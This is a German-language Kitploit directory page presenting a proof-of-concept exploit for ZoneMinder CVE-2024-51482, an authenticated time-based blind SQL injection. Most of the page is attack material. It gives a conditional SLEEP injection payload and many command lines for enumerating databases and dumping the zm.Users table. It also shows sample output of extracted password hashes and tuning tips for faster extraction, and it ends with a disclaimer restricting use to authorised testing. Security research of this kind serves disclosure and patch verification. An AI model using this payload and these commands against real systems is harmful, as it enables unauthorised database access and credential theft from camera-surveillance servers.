Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-51482-PoC — Authentifizierte zeitbasierte blinde SQL-Injection-PoC für ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
Tools/GitHubGitHub/plur1bu5/cve-2024-51482-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

Authentifizierte zeitbasierte blinde SQL-Injection-PoC für ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

Repository anzeigen
14vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-51482-PoC

Authentifizierter zeitbasierter Blind-SQL-Injection-Exploit für ZoneMinder v1.37. <= 1.37.64*

Überblick

Dies ist ein Proof-of-Concept-Exploit für CVE-2024-51482, eine zeitbasierte Blind-SQL-Injection-Schwachstelle in der Ereignisverwaltungsfunktion von ZoneMinder. Der Exploit erfordert eine Authentifizierung und verwendet bedingte SLEEP-Abfragen, um Daten aus der Datenbank zu extrahieren.

Funktionen

  • Authentifizierte Ausnutzung – Anmeldung mit Zugangsdaten oder Session-Cookie Längenerkennung – Binärsuche zur Ermittlung der exakten Zeichenkettenlänge vor der Extraktion
  • Parallele Extraktion – Multithreaded-Zeichenextraktion für Geschwindigkeit
  • Optionen im sqlmap-Stil – Datenbanken, Tabellen, Spalten auflisten und Daten ausgeben
  • Sichere Standardwerte – 3s Verzögerung, 5 Threads für hohe Genauigkeit
  • Fortschrittsanzeige – Echtzeit-Extraktionsfortschritt mit ausführlichem Modus
  • Saubere Ausgabe – Formatierte Tabellenanzeige für exportierte Daten

Voraussetzungen

root@kitploit:~
pip install requests

Schnellstart

Standardmodus – Zugangsdaten ausgeben

root@kitploit:~
python3 poc.py -t example.local -u admin -p password

Mit Session-Cookie

root@kitploit:~
python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Verbose-Modus

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -v

Verwendung

Datenbanken auflisten

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --dbs

Tabellen auflisten

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm --tables

Spalten auflisten

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Bestimmte Tabelle ausgeben

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Optionen

root@kitploit:~
Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

Leistungsoptimierung

Sicherer Modus (empfohlen)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Geschwindigkeit: ~2-3 Minuten pro Passwort-Hash
  • Genauigkeit: Hoch

Schneller Modus (kann Fehler enthalten)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Geschwindigkeit: ~30-60 Sekunden pro Passwort-Hash
  • Genauigkeit: Kann falsche Zeichen erzeugen

Beispielausgabe

root@kitploit:~
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

Funktionsweise

  1. Authentifizierung – Meldet sich mit Zugangsdaten an oder verwendet das bereitgestellte Session-Cookie
  2. Schwachstellentest – Bestätigt mit einem einfachen SLEEP-Payload, dass das Ziel verwundbar ist
  3. Längenerkennung – Verwendet Binärsuche, um die exakte Zeichenkettenlänge zu ermitteln
  4. Parallele Extraktion – Extrahiert alle Zeichenpositionen gleichzeitig
  5. Datenanzeige – Formatiert Ergebnisse in einer übersichtlichen Tabelle

Payload-Format

Der Exploit verwendet bedingtes SLEEP:

root@kitploit:~
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • TRUE-Bedingung: Keine Verzögerung (0 Sekunden)
  • FALSE-Bedingung: Volle Verzögerung (3 Sekunden)

Fehlerbehebung

Ungenaue Ergebnisse

Wenn Sie falsche Zeichen erhalten (z. B. $ wird zu 8):

root@kitploit:~
# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Zu langsam

Wenn die Extraktion zu langsam ist:

root@kitploit:~
# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

Keine Daten gefunden

Wenn die Standardtabelle zm.Users nicht existiert:

root@kitploit:~
# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

CVE-Informationen

  • CVE-ID: CVE-2024-51482
  • Betroffene Versionen: ZoneMinder v1.37.* <= 1.37.64
  • Behoben in: v1.37.65
  • Schwachstellenart: Zeitbasierte Blind-SQL-Injection
  • CVSS-Score: TBD

Haftungsausschluss

Dieses Tool dient ausschließlich Lehr- und autorisierten Sicherheitstestzwecken.

  • Verwenden Sie dieses Tool nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben
  • Unbefugter Zugriff auf Computersysteme ist illegal
  • Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Holen Sie immer eine ordnungsgemäße Genehmigung ein, bevor Sie Sicherheitsbewertungen durchführen

Referenzen

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

Lizenz

Dieses Projekt wird ausschließlich zu Lehrzwecken bereitgestellt. Verwenden Sie es verantwortungsvoll und ethisch.


⭐ Wenn Sie dies nützlich finden, geben Sie dem Repository bitte einen Stern!

Tool herunterladen